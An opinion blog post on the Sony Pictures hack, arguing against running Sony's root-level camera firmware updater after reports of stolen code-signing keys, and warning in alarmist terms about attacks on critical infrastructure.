Sony Pictures Hacked: Do You Really Want to Update your Camera Firmware with a Sony Updater that Runs as 'root'?
A month ago I wrote in Sony Firmware Updater: a Security Risk that the Sony firmware carried serious security risks, because it runs as a kernel extension (complete control over the system). It was a prescient blog post.
If you have not been following it, the IT infrastructure of Sony Pictures was hacked, taking down large chunks of Sony’s operations for at least a week, according to news reports. As well as exposing all sorts of juicy stuff to public view, like internal emails, as the Wall Street Journal reports in At Sony Pictures, Drama in Email. And a lot more apparently.
Ask your self a simple question: do you want to run a Sony updater that runs as “root” (total control over the system) from a company that has been hacked in one of the most devastating IT attacks in memory? (update: Sony private keys have been stolen).
Why would the perp stop at Sony Pictures—what’s to stop malware from being inserted into the Sony updater, which having complete control over your system as root, could do anything it wants, such as keylogging all your passwords, and then emptying your financial accounts, or similar fun stuff. Without Sony having a clue. Or you. Until you find that all your your bank accounts are empty.
Sony private keys stolen
This was written after the previous paragraph was written, before your author knew that keypairs had been stolen.
A PFX file usually contains the private key corresponding to the public key.
Compromise of the private key of a public/private keypair is a massive security blunder with huge ramifications: all content signed by that key is reported as “verified”. Yet SecureList.com reports that Sony PFX files containing private keys have been stolen.
If the PFX files are not protected with unusually strong passwords, password cracking can be employed (using massively parallel services). Once a private key is compromised, hacker malware can be inserted into desired content, then signed with the now compromised private key. The software/content would be valid by definition, since it is signed. Sony should immediately revoke all of its stolen public/private keypairs for that reason. Yet so far, it seems that Sony is mum on the stolen keypair issue. Which if correct is grossly and perhaps criminally irresponsible, because of the huge worldwide potential for damage by compromise of user systems.
It is inconceivable that a private key used by a major corporation to sign software be on any web-accessible computer. It is gross negligence. Yet this is what Sony has apparently made its practice, for how could PFX files otherwise have been stolen.
Put simply, the smart move is to assume that ALL Sony digitally-signed content/software might be compromised (soon or in coming months). As per SecureList.com:
So far dozens of PFX files have been leaked online. PFX files contain the needed private key and certificate. Such files are password protected, but those passwords can be guessed or cracked. Not all of these PFX files will be of immediate value to attackers.
The importance of leaked code-signing keys cannot be overestimated. Software signed by a trusted publishing house will generally be trusted by the operating system, security software and first responders. It's an extremely powerful way for attackers to stay below the radar.
The scope of the recent hack of Sony Pictures — in which unidentified infiltrators breached the Hollywood studio’s firewall, absconded with many terabytes of sensitive information and now regularly leak batches of damaging documents to the media — is only beginning to be grasped. It will take years and perhaps some expensive lawsuits too before anyone knows for certain how vast a problem Sony’s digital Valdez may be.
But the take-away for the rest of the world beyond Sony and Hollywood is plain: Being cavalier about cybersecurity, as Sony’s attitude in recent years has been characterized is like playing a game of corporate Russian roulette.
Sony counter attacks?
Stolen content has appeared on various sites, and apparently Sony is attacking sites hosting the content, a dubious practice at best, and possibly illegal here in the USA. That article does not cite its sources, other than “two people with direct knowledge of the matter”, so it could be incorrect, but it would not be out of character with Sony’s past ethical lapses.
Now forgetting Sony, consider whether the 'Cloud' is safe: Apple and Google and so on are tempting targets for all hackers. Do you want to store your stuff in the Cloud? The idea of storing anything sensitive in The Cloud is a really bad idea, just by the constant and ongoing security breaches one can read about every week. The advice here is “think about it”. But hey, cats don’t do it and celebrities do.
But all such stuff is trivial in the Big Picture. And Sony is just the canary in the coal mine. News reports indicate USA power infrastructure has been hacked. Consider the taking down of critical infrastructure of all kinds by skilled hackers backed by a foreign government. The recent turkish pipeline explosion was a non-event in terms of all the internet-connected gear that was supposed to monitor the pipeline and report failures. But stuff blew up and burned nonethelss.
Now consider the same 'turkish' ideas applied simultaneously to every power plant, nuke plant, electrical and pumping and substation, dams, ventilation systems, pipelines and railroads and hospitals and even home power meters (installed by mandate on every home here in California by jackasses with no concept of security risks). All at once with a few keystrokes, everything everywhere stops working. Stuff shuts down, blows up. Maybe a nuke melts down for good measure. Well, to put any critical infrastructure on the internet is criminally negligent by design. Cut off the water and power and nothing works—possibly for weeks and month if hackers persist. Millions die in urban areas from deprivation of food and water (consider even simple things, like cutting off natural gas supply in a severe cold front in winter). Riots and anarchy reign. Or just shoot out a few key transformers across the country. Yet this national security threat hardly registers with any of our professional politicians. The next war may not have a shot fired.